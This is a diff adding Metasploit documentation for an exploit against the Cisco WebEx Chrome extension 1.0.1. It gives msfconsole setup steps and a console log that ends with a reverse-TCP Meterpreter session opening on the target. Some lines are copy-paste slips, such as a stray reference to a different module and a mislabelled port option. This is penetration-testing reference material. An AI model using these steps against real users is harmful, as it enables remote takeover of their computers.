|
| 1 | +Cisco WebEx is a suite of applications for online meeting organization and video conferencing. |
| 2 | +Included in this suite are extensions for popular web browsers which ease use and provide supplemental |
| 3 | +features. |
| 4 | + |
| 5 | +Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an |
| 6 | +attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution. |
| 7 | + |
| 8 | + |
| 9 | +## Vulnerable Application |
| 10 | + |
| 11 | +Cisco WebEx Chrome Extension 1.0.1 is known to be affected. |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | + |
| 15 | +**Using cisco_webex_ext** |
| 16 | + |
| 17 | +After the encrypted communication is enabled, you are ready to use |
| 18 | +hp_dataprotector_encrypted_comms. Here is what you do: |
| 19 | + |
| 20 | +1. Start msfconsole |
| 21 | +2. Do: ```use exploit/windows/misc/cisco_webex_ext``` |
| 22 | +3. Do: ```set SRVHOST [IP ADDRESS]``` |
| 23 | +4. Do: ```set SRVPORT [PAYLOAD NAME]``` |
| 24 | +5. Do: ```set URIPATH [ARBITRARY URI]``` |
| 25 | +6. Do: ```Choose a payload and set any specific options``` |
| 26 | +6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following: |
| 27 | + |
| 28 | +``` |
| 29 | +msf > use exploits/windows/misc/cisco_webex_ext |
| 30 | +msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151 |
| 31 | +srvhost => 10.6.0.151 |
| 32 | +msf exploit(cisco_webex_ext) > set srvport 4567 |
| 33 | +srvport => 4567 |
| 34 | +msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting |
| 35 | +uripath => not_a_very_good_meeting |
| 36 | +msf exploit(cisco_webex_ext) > run |
| 37 | +[*] Exploit running as background job. |
| 38 | +
|
| 39 | +[*] Started reverse TCP handler on 10.6.255.229:4444 |
| 40 | +[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting |
| 41 | +[*] Server started. |
| 42 | +msf exploit(cisco_webex_ext) > [*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting |
| 43 | +[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 |
| 44 | +[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html |
| 45 | +[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 |
| 46 | +[*] 10.6.0.151 cisco_webex_ext - Sending exploit html ... |
| 47 | +[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N |
| 48 | +[*] 10.6.0.151 cisco_webex_ext - From: |
| 49 | +[*] 10.6.0.151 cisco_webex_ext - Sending payload ... |
| 50 | +[*] Sending stage (957487 bytes) to 10.6.255.229 |
| 51 | +[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600 |
| 52 | +
|
| 53 | +msf exploit(cisco_webex_ext) > |
| 54 | +``` |
| 55 | + |
0 commit comments